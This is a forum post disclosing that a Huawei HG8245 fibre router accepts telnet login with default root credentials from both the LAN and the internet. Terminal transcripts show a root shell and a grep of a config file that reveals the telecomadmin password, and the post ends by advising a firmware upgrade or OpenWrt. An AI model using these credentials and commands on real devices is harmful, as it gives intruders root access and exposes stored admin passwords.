Administrators chain Posted December 4, 2021 Administrators Report Share Posted December 4, 2021 Hackers are very unlikely to break in to SOHO network from serial port, like in this post. This post is showing you that HG8245 can be exploited to get root access from the internet. The root password is permanently stored in the flash ROM and cannot be changed. The setup was very easy. One computer was connected to HG8245 through a LAN cable. Then I ran telnet and use root:admin access. Voila, connection was established! The next commmand was easy, call the shell. telnet 192.168.1.1 Trying 192.168.1.1... Connected to 192.168.1.1. Escape character is '^]'. Welcome Visiting Huawei Home Gateway Copyright by Huawei Technologies Co., Ltd. Login:root Password:***** WAP>shell BusyBox v1.4.1 (2011-07-29 10:25:20 HKT) Built-in shell (ash) Enter 'help' for a list of built-in commands. WAP(Dopra Linux) # grep telecomadmin /mnt/jffs2/hw_ctree.xml <X_HW_WebUserInfoInstance InstanceID="2" UserName="telecomadmin" Password="nE7jA%5m" UserLevel="0" Enable="1"/> WAP(Dopra Linux) # Alright... alright... probably because it is wired directly to LAN. What about telnetting from the internet? First, connect the HG8245 to your ISP provider and find its IP address. Then telnetting... telnet 183.x.x.x Trying 183.x.x.x... Connected to 183.x.x.x. Escape character is '^]'. Welcome Visiting Huawei Home Gateway Copyright by Huawei Technologies Co., Ltd. Login:root Password:***** WAP>shell BusyBox v1.4.1 (2011-07-29 10:25:20 HKT) Built-in shell (ash) Enter 'help' for a list of built-in commands. WAP(Dopra Linux) # grep telecomadmin /mnt/jffs2/hw_ctree.xml <X_HW_WebUserInfoInstance InstanceID="2" UserName="telecomadmin" Password="nE7jA%5m" UserLevel="0" Enable="1"/> WAP(Dopra Linux) # Unbelievable! Super scary! Too easy to break in! Anyone owns one of this ONT should try to upgrade to the latest firmware. Better yet, install OpenWrt! Quote Link to comment Share on other sites More sharing options...